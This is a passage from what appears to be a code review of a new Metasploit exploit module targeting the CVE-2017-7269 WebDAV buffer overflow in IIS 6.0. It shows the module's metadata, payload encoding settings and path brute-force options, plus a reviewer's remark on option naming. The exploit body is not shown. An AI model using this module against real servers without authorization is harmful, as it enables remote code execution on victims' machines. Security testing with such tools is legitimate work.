modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb

```diff
@@ -0,0 +1,179 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => ' Microsoft IIS WebDav ScStoragePathFromUrl Overflow',
+      'Description'    => %q{
+          Buffer overflow in the ScStoragePathFromUrl function
+          in the WebDAV service in Internet Information Services (IIS) 6.0
+          in Microsoft Windows Server 2003 R2 allows remote attackers to
+          execute arbitrary code via a long header beginning with
+          "If: <http://" in a PROPFIND request, as exploited in the
+          wild in July or August 2016.
+
+          Original exploit by Zhiniang Peng and Chen Wu.
+      },
+      'Author'         =>
+        [
+        'Zhiniang Peng', # Original author
+        'Chen Wu',       # Original author
+        'Dominic Chell <dominic@mdsec.co.uk>', # metasploit module
+        'firefart', # metasploit module
+        'zcgonvh <zcgonvh@qq.com>', # metasploit module
+        'Rich Whitcroft' # metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2017-7269' ],
+          [ 'BID', '97127' ],
+          [ 'URL', 'https://github.com/edwardz246003/IIS_exploit' ],
+          [ 'URL', 'https://0patch.blogspot.com/2017/03/0patching-immortal-cve-2017-7269.html' ]
+        ],
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'Space'         => 2000,
+          'BadChars'      => "\x00",
+          'EncoderType'   => Msf::Encoder::Type::AlphanumUnicodeMixed,
+          'DisableNops'   =>  'True',
+          'EncoderOptions' =>
+            {
+              'BufferRegister' => 'ESI',
+            }
+        },
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'process',
+          'PrependMigrate' => true,
+        },
+      'Targets'        =>
+        [
+          [
+            'Microsoft Windows Server 2003 R2 SP2',
+            {
+              'Platform' => 'win',
+            },
+          ],
+        ],
+      'Platform'       => 'win',
+      'DisclosureDate' => 'Mar 26 2017',
+      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, 'Path of IIS 6 web application', '/']),
+        OptInt.new('MinPathLength', [ true, 'Start of physical path brute force', 3 ]),
+        OptInt.new('MaxPathLength', [ true, 'End of physical path brute force', 60 ]),
```

Comment:
This style convention is documented at https://github.com/rapid7/metasploit-framework/wiki/How-to-use-datastore-options#ideal-datastore-naming